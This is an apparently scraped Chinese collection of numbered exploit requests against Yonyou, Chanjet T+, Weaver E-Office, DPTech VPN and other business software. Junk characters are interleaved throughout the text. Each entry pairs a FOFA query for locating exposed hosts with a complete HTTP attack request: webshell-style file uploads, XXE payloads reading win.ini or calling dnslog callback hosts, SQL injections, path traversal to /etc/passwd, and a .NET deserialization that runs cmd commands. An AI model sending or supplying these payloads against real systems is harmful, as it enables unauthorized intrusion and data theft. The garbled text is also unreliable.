Connection: keep-alive. q' W+ r5 e3 {0 H+ O

8 r6 b! @8 A  g/ q  i, M6 |$ ~+ I; R! ~& V+ X
35. 用友NC-Cloud importhttpscer任意文件上传
; n7 R5 J- W& d7 ]FOFA:app="用友-NC-Cloud"
4 G! Q+ T" n8 H6 `POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
' K) z2 s5 [1 \0 _Host: 203.25.218.166:8888
) |' ^$ T4 `2 j' h- A4 x2 IUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
( t; }' Z! o, K' IAccept-Encoding: gzip, deflate/ t# q' a6 B( _2 z$ x& e+ n- r# ~
Accept: */*( c' f* |& C1 k+ B
Connection: close8 [3 r  ~6 ^' Y4 M" G, R
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA) E8 J, J5 N% \: N; O
Content-Length: 190
+ p2 w% B  u( z1 TContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0, D- F" T5 Q" \; h; F# l" J9 y/ _6 [

+ q5 m- ?4 @# Y--fd28cb44e829ed1c197ec3bc71748df0
  z. \$ `6 r" X3 }Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"" {: d5 F; i3 ~! m" x6 G7 y9 J

/ D( `7 G8 k% s$ Y* W# n" D<%out.println(1111*1111);%>; @1 t9 W" I5 U, v" a
--fd28cb44e829ed1c197ec3bc71748df0--) A! x) d5 l8 \7 E+ D

7 N1 `5 C, P: x' ~0 V/ X  B: n
% H3 ]9 p3 }6 ~6 I& m36. 用友NC-Cloud soapFormat XXE! e# x, e/ x$ R
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"1 ]" l: s9 _& q4 v3 ]2 y! C" }
POST /uapws/soapFormat.ajax HTTP/1.12 W/ U. I( u; R
Host: 192.168.40.130:8989
0 I- `* ~4 R' g7 b" h8 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
6 b* T4 ^; z# K  _: m- V+ tContent-Length: 2638 k3 t. h+ y# ]/ I; d$ ?$ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* `3 _6 b' _0 `9 Z1 v$ g* Y* V
Accept-Encoding: gzip, deflate
# J& \5 t0 ?; H! t. D) RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, k( z* K! ~/ I$ j+ V4 j! ~/ l# U5 t
Connection: close
4 O3 @- @% c3 ]6 V1 cContent-Type: application/x-www-form-urlencoded4 D: R) o! I: k2 ^" c1 W- @- i
Upgrade-Insecure-Requests: 1; t9 i  \4 Y" M5 Q
/ i, [; x2 x! R: w9 {
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
7 `& _4 G& F6 G9 \1 r& |
+ b* k! e7 Z9 ^$ q6 V4 Q4 p3 U# i9 p) I5 `
37. 用友NC-Cloud IUpdateService XXE: `* Q6 g. T2 n( U* A+ Q7 e- R
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 m3 z) A3 v$ OPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
+ w# E9 V5 f& n. G  F/ fHost: 192.168.40.130:8989! Z* |* d+ g" p, E, D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
0 k: I* a. f( b" S- }Content-Length: 4210 d) j2 U# H9 l% @; x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% h; l- ?; t% M* T; N- t: }
Accept-Encoding: gzip, deflate, v# {9 D2 q7 F( }7 ^* C
Accept-Language: zh-CN,zh;q=0.95 d9 _; p5 m' Z, N
Connection: close" n7 h3 Y1 B  J
Content-Type: text/xml;charset=UTF-8
! g0 |8 |7 T+ p  E7 ]SOAPAction: urn:getResult
7 z, o% d1 }0 B$ k3 pUpgrade-Insecure-Requests: 1
* M7 X" h/ f( M0 y- v7 J2 B' k% ^8 O0 J4 r9 e; v4 F! M% r) i
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
* K; a7 a3 s7 `7 n% N, D<soapenv:Header/>+ v4 I* p" J0 |% K- g& u
<soapenv:Body>
5 [7 ?* e5 W; J" U+ o  j5 C<iup:getResult>6 A0 K, O) L& F6 x
<!--type: string-->7 f# d2 j6 M/ o& d; Z' j& T, P0 ?
<iup:string><![CDATA[& R; l, c+ R  K, s5 t( i
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]># l, L2 c$ X* o  s! ?/ K: N
<xxx/>]]></iup:string>
: S% c9 I- j& A& i$ x$ V</iup:getResult>9 H5 @6 d5 Z& u" Q
</soapenv:Body>
0 H0 ^( O4 D" V5 q1 N! ?- u</soapenv:Envelope>5 b% N1 I4 ^" q) P5 b8 J

) P* B5 R' y! X6 I
) I: g0 L. H! t6 Z6 t' U- s$ A3 J$ ~2 `$ n2 M0 f  ~/ `
38. 用友U8 Cloud smartweb2.RPC.d XXE4 C7 M% k; h) _- k: b5 I
FOFA:app="用友-U8-Cloud"7 }  ?$ U3 Q# F; R2 E
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
8 @, l& ^1 V5 K0 T% T# DHost: 192.168.40.131:8088, O/ S0 L0 I9 k; O7 Z% `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
) l7 _8 z9 t# Q* B' {. q, e" cContent-Length: 260$ v3 L! p) G" [7 N- N/ D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
' q' H0 h5 J9 KAccept-Encoding: gzip, deflate/ ]0 n$ A$ ^* J) A, f0 g
Accept-Language: zh-CN,zh;q=0.98 T% L2 I+ G, \) A+ z- F/ ^
Connection: close
* y. K# i/ }5 r5 f( |" hContent-Type: application/x-www-form-urlencoded
; f7 J9 P- u& S& L. z% e' J
0 f+ ]1 Y0 p7 U0 n__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>5 n8 J$ {1 J6 e# d
/ J  t9 }. [2 s; K, Z5 D+ T' A$ a

9 m8 }& l% M; f; U4 d39. 用友U8 Cloud RegisterServlet SQL注入
% K$ g, _" {8 O7 M4 }FOFA:title="u8c"
. l6 N8 f7 X8 ?1 s1 W9 i7 _; b( `POST /servlet/RegisterServlet HTTP/1.1& R9 T0 {7 ]  i4 @- o2 X
Host: 192.168.86.128:8089
$ }$ t" j5 t/ gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36  {) w7 Y& }/ S& J$ @- q
Connection: close
8 Y# O& O! @6 D, c. O: X9 ]: G5 OContent-Length: 85
  k& {+ w: v/ N. z0 F+ WAccept: */*" V4 o+ f- F4 d" g
Accept-Language: en" P" n/ i1 b* Y
Content-Type: application/x-www-form-urlencoded
5 \9 v: S* v- P, u0 qX-Forwarded-For: 127.0.0.1
7 d7 p3 J4 W8 J1 ^* {Accept-Encoding: gzip
2 i: N# s' n; X, \6 I
: E6 B/ ]2 q; P; D) s+ l: susercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
( x( M  `: i/ y: ~' a$ t
0 y2 I( F% b& L, S
% j  m" m6 @( k1 {' S3 C" c40. 用友U8-Cloud XChangeServlet XXE
9 e2 E2 B- `5 _2 T- c$ yFOFA:app="用友-U8-Cloud"
1 }2 e$ C, i& x0 I/ r4 l! OPOST /service/XChangeServlet HTTP/1.12 S0 N' p- h8 F
Host: x.x.x.x
5 D8 n9 H2 h" gUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; h* x! [2 C" SContent-Type: text/xml  }; ?3 I6 v9 g6 R4 d/ Y6 _9 ~* ~
Connection: close0 R* l" m! |$ E8 f9 `4 \

1 B- A7 W0 [- h" {1 G<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>; p6 b' N4 S* Q3 G
7 e% |6 I% F' ^' v  V
! e. j4 U" u. H5 _& p
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
$ [9 ~* j0 J1 s' f7 D  \8 `FOFA:app="用友-U8-Cloud"
) d# O* S" M; @GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
. \% ]6 t% T( I6 d1 x+ e/ yHost:
0 ~9 [: m! o/ `7 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ _0 D$ J3 e( k& u% v$ T
Content-Type: application/json4 @# J, y" I/ C4 f
Accept-Encoding: gzip
9 o; N1 x. X: n+ y1 W* c$ n/ vConnection: close  ^* `5 g7 ]9 N& M5 j! d4 W7 F

+ ?; V  Y# K7 Q' i
- X  S# M% z/ @42. 用友GRP-U8 SmartUpload01 文件上传
; H# s2 }# p+ f0 b7 eFOFA:app="用友-GRP-U8"7 e. H* B3 }% S' U
POST /u8qx/SmartUpload01.jsp HTTP/1.1
0 C# a1 d$ P, z# t+ t  t- L/ r, fHost: x.x.x.x& i! C9 K4 H5 I) S" a9 W, m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
/ a) @7 Z, t2 ?$ i+ oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
$ p4 {9 i5 e8 _
" `# W# a8 H/ q. w; wPAYLOAD+ m8 P8 ]7 h; p- q! \/ p* a$ V
8 E+ e- J/ f5 w6 R
$ W2 O; _& z* A$ f- m: j. W
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
  _! D$ h/ n' D/ g( j0 F) k
6 p! ~" D5 a5 m& L) T43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 [# C. w6 Q: [4 M' @; [
FOFA:app="用友-GRP-U8"
, Y. [5 z$ r+ U* M8 ?+ i$ t$ ^# ^7 DPOST /services/userInfoWeb HTTP/1.1
' \; ^' ]5 a6 G3 \8 w* B/ Q/ RHost: your-ip1 l) w$ w* o9 o+ k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36* s* |; }; @, w4 {, h  k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* i9 v- k9 U8 @5 CAccept-Encoding: gzip, deflate! h% v: f) f& q
Accept-Language: zh-CN,zh;q=0.9
: t. P* h- w$ A* VConnection: close
+ U$ ?! X% l( ^' eSOAPAction:: h5 q  t+ E7 c; i# R
Content-Type: text/xml;charset=UTF-8
' \* S0 A! B- C, r5 i8 k6 B9 C0 p, Z) w  a, L3 h
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">$ _# q+ U; I: t1 t
   <soapenv:Header/>
- E3 {2 N$ v1 W/ U: ]2 r$ y   <soapenv:Body>8 e  t' ]; `! i1 l4 @! S* |
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">; W& S& A. N6 {, @* S
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
5 R' z% `  v0 Z2 [2 F3 X3 _      </ser:getUserNameById>
: l% K+ d; K" O$ w9 S/ W   </soapenv:Body>2 l: t0 e( j& K( @, X% Z! e: [
</soapenv:Envelope>% s) m* O* C% |6 |6 ^

" K+ }* j" V3 c0 k, @5 O6 I, a
1 c1 a7 ~6 _0 V0 H, r2 @: }/ E44. 用友GRP-U8 bx_dj_check.jsp SQL注入: |* C& P) W% Y" d1 P
FOFA:app="用友-GRP-U8"+ P- g4 H7 f, }4 A9 n
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1: t; }. O% \  e! D' s
Host: your-ip
% S1 _  F) y3 v7 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
# |% V2 _" d5 X6 i9 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 y( [' R3 f4 P8 b- N1 iAccept-Encoding: gzip, deflate
' D6 _6 F5 h6 b: y1 d* q: \9 iAccept-Language: zh-CN,zh;q=0.9; N9 o( g: v3 ~8 V9 d
Connection: close* @4 _8 R8 ~, j8 X
* u0 w4 @- K, p9 u$ o/ t6 d
" Z; y3 T' `! E* D' @; S$ V3 N
45. 用友GRP-U8 ufgovbank XXE
. Z, y6 T1 G  T8 \/ f3 XFOFA:app="用友-GRP-U8"  ~( e' P/ S9 E, S/ L$ Q# a2 U  @
POST /ufgovbank HTTP/1.1$ ^- U: C7 T6 I4 {' }0 V! r' O
Host: 192.168.40.130:222
# U$ C7 \+ p$ {  xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0' S# H+ J% v& b& v/ R, s8 a
Connection: close. \. S3 g2 J) K' ]3 w9 R2 e
Content-Length: 161
' O+ h8 l# s' [4 B; `  r3 U; wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 T3 ?. s! Y/ ~( O, t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ ?: }( q. \0 q! ]0 \$ ^1 s
Content-Type: application/x-www-form-urlencoded0 `7 d: N  n2 N) z* K# q
Accept-Encoding: gzip9 }$ ~2 B8 X  Y/ w

0 d7 a) k7 x* LreqData=<?xml version="1.0"?>
; T$ D$ z6 H3 Z# y<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
+ a6 F# j; R' X7 k# R
+ E$ Q. M5 Q1 U0 G5 x3 w9 K
' M4 p5 n) j% I46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. i1 g4 |! _+ f/ V& ZFOFA:app="用友-GRP-U8"
& J5 P& r7 h/ w+ i# E  t+ uGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.16 [# O: z* w+ b  G8 J- _4 H. L
Host: your-ip" Y+ R' j1 Q8 B* Q" w8 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
2 {, g  a1 H! ^! aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  W3 }$ U' Y& @
Accept-Encoding: gzip, deflate( P/ v8 ]# F: {$ U/ E
Accept-Language: zh-CN,zh;q=0.9
" v4 b2 A2 `0 \+ T: M- o5 I4 SConnection: close
4 O* C2 l2 y0 L: F1 o2 R. \7 {, G. W3 B3 u1 ~! m6 ]" R1 B$ ]1 {. ~2 z

% G, G- c# \, F4 q- @47. 用友GRP A++Cloud 政府财务云 任意文件读取4 X+ x  h  u0 u& t
FOFA:body="/pf/portal/login/css/fonts/style.css"8 @; m4 |2 A0 }' p( |/ G4 Q
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, E: ~5 w6 ~- v# j/ z3 e9 n/ }3 uHost: x.x.x.x8 F& V* h& w* ?1 C" A3 C
Cache-Control: max-age=01 R2 k- x5 W! b. A0 u0 M! y
Upgrade-Insecure-Requests: 1
/ I. `% I7 T" `* _3 q* `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* H+ K- H2 R( W8 P9 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( W, O8 S) k; e  vAccept-Encoding: gzip, deflate, br2 M& y, e1 ]% f- l
Accept-Language: zh-CN,zh;q=0.90 n4 _+ p- _; S
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
2 X# M2 B5 |3 n  h7 oConnection: close$ q4 g3 }" y# X, q

3 H% J; e7 t' ~) T& H
& G  f. V0 a0 i6 }
  H- D8 M* B, A( ?48. 用友U8 CRM swfupload 任意文件上传
' p" ^' W3 r* g: A7 FFOFA:title="用友U8CRM"0 ]+ b: |% |; [
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
3 D1 Z  g$ i$ y; A  F$ {9 N' uHost: your-ip
2 Z. Z7 J$ ], a. z7 `  B" uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 o9 ?9 h! i- ~& f8 P9 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! z& r/ M. p; u; H& _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  H0 K( b3 C% _# d
Accept-Encoding: gzip, deflate" s7 S, Q, ]+ }
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855, F, W2 K& H0 z! y- S1 c
------269520967239406871642430066855- P- F( E, h' @0 z
Content-Disposition: form-data; name="file"; filename="s.php"7 M4 }1 m: S5 x/ T4 J- a3 ^8 h
12310 e' I. w# S0 J! H* D# e
Content-Type: application/octet-stream0 a! X, G% L% U
------269520967239406871642430066855
0 _1 @: T" g$ T5 [$ r" ^2 ~4 GContent-Disposition: form-data; name="upload"$ j3 ^1 m/ k/ p: ^; `
upload
' o2 s% P# }) [/ B8 @# U------269520967239406871642430066855--, o5 K6 d- j; K6 P: S' J
$ m. m: i% E! D

7 ~# B* p/ S$ f1 C8 s; J" N49. 用友U8 CRM系统uploadfile.php接口任意文件上传
6 k1 n) h% o/ J7 z7 P$ V+ wFOFA:body="用友U8CRM"7 @1 c7 q$ }" j) y6 {

& O. {# a, ?% s. SPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1/ r3 d# u0 Z$ ^, v
Host: x.x.x.x! P. v( ~4 u' b" T+ G% i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 f  E0 O7 @' MContent-Length: 3298 u8 o( ?; e, ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- _* ?1 P5 \. Q9 T: f5 `  i, a
Accept-Encoding: gzip, deflate) [  ]+ i% L, C; o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& ]$ u1 G3 }! u. j1 Y& r2 |% e7 d
Connection: close! n- w) P' Q7 {2 O( q. i
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w2 ]# d0 D+ O% ?3 Q2 M

# t2 b6 M7 z5 T( g+ q-----------------------------vvv3wdayqv3yppdxvn3w6 b$ c- A% G: r* r/ f" W! C
Content-Disposition: form-data; name="file"; filename="%s.php "
" ?5 Z* M) `' E- C5 Z1 NContent-Type: application/octet-stream
* l1 u/ N# e& ^  O
5 m+ M5 [2 ]4 {' }  z, |+ K+ ewersqqmlumloqa, e& ^$ W9 n8 K: @# ^6 y
-----------------------------vvv3wdayqv3yppdxvn3w2 F; l' w- f- k" v! {* l
Content-Disposition: form-data; name="upload"
5 u: G, e$ D3 g' l# p
& K( ~  s' G: xupload
) ~, M. y) D* a$ ?-----------------------------vvv3wdayqv3yppdxvn3w--6 T6 f) b# c. _3 x( P' o8 ?( v  b
3 Z, w* }7 W7 R4 t( @
; N! U6 F/ `  x2 q
http://x.x.x.x/tmpfile/updB3CB.tmp.php
  K$ x: Y# b; N, T  b1 z- A! \  p! U: h0 r/ C+ z9 R) [  p6 t
50. QDocs Smart School 6.4.1 filterRecords SQL注入& n2 E& m/ K- q- A2 v
FOFA:body="close closebtnmodal"7 i5 ^# y5 }/ y. m2 R$ B
POST /course/filterRecords/ HTTP/1.1
1 }) l# `& B0 bHost: x.x.x.x
  U8 o8 G& ]3 G' H7 j0 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" m( @3 D% D$ j# O0 Z# v1 z- Q2 J3 hConnection: close$ ~& _4 b- t& Z9 B( ]3 P; R) C
Content-Length: 224
* o* d% B1 k6 u& X6 L( G( mAccept: */*- h( U1 t% N" m2 ]( Z! F
Accept-Language: en/ }* h* X6 ]/ S( \- ^7 I$ Q
Content-Type: application/x-www-form-urlencoded, z$ A! F* L" G, e% n
Accept-Encoding: gzip
! o: W8 W8 v& z* Z6 D! w
0 \9 K; r' n2 f, Tsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
: T6 D$ I% K+ a4 E0 y1 n- O# R5 P
/ z  |3 t/ f& s6 A) E9 W- G5 o4 I$ k+ C8 [+ K7 H  U
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入& I% U4 c' m5 `6 N% D
FOFA:app="云时空社会化商业ERP系统". a& y/ D, h+ U: f; l( }
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
" b) A) `  {2 W  V% r3 v7 Q$ ~( mHost: your-ip
; C. ]0 ]7 y: M6 K2 H, O8 f  CUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.360 g3 E. d# k# W9 l6 K5 c  M9 R, U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! S5 `2 P' W( X; B! J$ a, I2 KAccept-Encoding: gzip, deflate2 I( c6 {6 z% \5 e( |
Accept-Language: zh-CN,zh;q=0.9
; e( B5 z; _  d. t' t, r( ~Connection: close' K; p$ }5 c4 X4 Y$ v) _& e5 f8 w

* V& h8 [' ^* R3 J5 l" o! K+ q; L; [" e% z- v8 u+ G4 A
52. 泛微E-Office json_common.php sql注入
, B4 o5 @7 B# u' O! Q0 w; DFOFA:app="泛微-EOffice"
% ]" I8 u' n8 ^# z5 xPOST /building/json_common.php HTTP/1.1  Q; K6 s) J0 B/ T0 a% h: n
Host: 192.168.86.128:8097: f: j4 O) @1 {6 Z! I1 h* l
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! \; i4 A6 o: i0 T) F3 E1 u, L
Connection: close- F$ i" Z6 \2 T& X, v- O
Content-Length: 87
7 e- q7 [% o+ E, B& QAccept: */*0 W/ w- M5 ~: }) \4 M
Accept-Language: en
6 O, J  k! t! yContent-Type: application/x-www-form-urlencoded$ k" k3 n4 s# w; J7 ^& O
Accept-Encoding: gzip
' x2 l7 W6 @4 [5 M" n
0 I7 N. `5 x6 d7 htfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3330 x3 g7 S1 a& v; j7 e( p
5 g: k( A7 J% n$ y1 G( ^8 e
$ n& ]: t8 E- _; i" D3 c1 A
53. 迪普 DPTech VPN Service 任意文件上传
  A% i+ X# Y2 Q  A. r: i  RFOFA:app="DPtech-SSLVPN"
9 B! `* C+ Y5 s2 u/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
3 ]( M  g% W$ d4 q; {" G1 |
" Y' Q$ {/ g6 R  O
4 }, B# @4 i" {54. 畅捷通T+ getstorewarehousebystore 远程代码执行
% J8 I; \( g) K, @9 iFOFA:app="畅捷通-TPlus"
6 c( F. r4 L* ]第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
* ?& A8 k  I) ]; ?) y"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"3 K# v$ ^; w8 R6 b4 @
3 a) q0 ]) r! X, y/ z3 j
% Z0 I0 N0 W$ z
完整数据包. c6 O; [3 }3 L( h' X) u: r' [+ d
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
$ u2 R" z6 ]1 ?1 ]0 Z* HHost: x.x.x.x1 J1 p! ]1 W  o
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F8 R6 }* R5 |; m
Content-Length: 593
# o+ Z* Z- [4 ^# R% c. {: h" ~: |; g4 _3 P/ U+ M
{: C7 Y# z4 ~$ T. h( J6 L
"storeID":{
( L% E- b/ h, F "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
# C9 q: k% ^1 D. O "MethodName":"Start",  G' |7 k' [5 b) D
  "ObjectInstance":{
$ N+ F8 ^& B, w9 K   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, T/ S* \6 D6 Y3 E. D  e! p    "StartInfo":{: b6 @9 v+ T6 D5 W! ~% s
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ |6 l6 t$ X/ ^: P! t6 c
    "FileName":"cmd",$ b# U5 O8 [9 ?; A8 E* Y2 g
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
1 D3 I) U0 j2 W0 ]: p6 \    }  c" o: X. z$ e" r& E( ~, W
  }
* L; P# y- {9 I- |: y  c# c& X  }0 |0 e) G" y' ^2 P
}
5 \5 T; {& E& e+ N& O/ _0 @. S, y
2 |# L9 ?% x! i3 u0 ^* e. n
第二步,访问如下url
$ V7 R& T2 U2 @. D2 G6 @/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt( \, `4 h- k: B+ Y& S  d0 Y% K
' I3 K( R( P: s9 J5 n. [
6 J/ I7 x% W. L# ^; h0 H3 P2 V
55. 畅捷通T+ getdecallusers信息泄露& o; G" s6 P' C, n. c3 C
FOFA:app="畅捷通-TPlus"/ s& E' K1 P$ p  O3 b
第一步,通过0 M$ A' v0 N, I& A
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
" T% x- w, z7 C6 z4 s! U) @第二步,利用获取到的Cookie请求
& Q$ I5 K8 Z6 H% K$ T4 g/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
& I: k8 r' T5 `4 H/ t, K9 ]
) j7 u# L1 z6 {2 B) \56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE& O& ]7 q0 j' X) @- Y- L
FOFA: app="畅捷通-TPlus"( T! q7 u1 X0 z9 s! H% y
